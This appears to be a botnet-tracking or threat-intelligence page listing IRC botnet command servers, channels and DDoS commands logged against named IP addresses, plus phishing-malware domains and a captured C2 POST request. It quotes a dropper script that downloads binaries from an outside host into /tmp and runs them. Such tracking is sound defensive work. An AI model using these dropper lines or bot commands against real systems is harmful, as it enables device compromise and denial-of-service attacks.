185.61.138.235(STD Botnet hosted in Ukraine Kiev Blazingfast Llc)

Another SDT botnet found by abigail. Server : 185.61.138.235 Port : 443 Channel : #secgod DDOS Coming Up : <~Broken> >bot +std 70.127.120.174 80 30 [STD]Hitting 70.127.120.174! [STD]Done hitting 70.127.120.174! <~Broken> >bot +stop Killing pid 13923. Other url : http://93.174.93.45/f.sh #!/bin/sh cd /tmp && wget http://93.174.93.45/mosh && chmod +x mosh && ./mosh cd /tmp && wget http://93.174.93.45/mox64

191.235.178.122(Modified Kaiten+STD hosted in Ireland Dublin Microsoft Informatica Ltda)

Found by abigail Server : 191.235.178.122 Port 443 Channel : #sh DDOS Coming Up lol : <~Haze> >bot +std 172.56.41.67 80 120 [STD]Hitting 172.56.41.67! [STD]Hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! [STD]Done hitting 172.56.41.67! The Bot u can download it here. Other : http://5.152.206.162/getbinaries.sh #!/bin/sh # THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER. # UPLOAD GETBINARIES.SH IN YOUR

jdsiwiqweiqwyreqwi.com(Phishing malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware: 34324325kgkgfkgf.com dsffdsk323721372131.com fdshjfsh324332432.com jdsiwiqweiqwyreqwi.com 80.242.123.208 HTTP Requests: URI: http://jdsiwiqweiqwyreqwi.com/dffgbDFGvf465/YYf.php DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: jdsiwiqweiqwyreqwi.com Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples: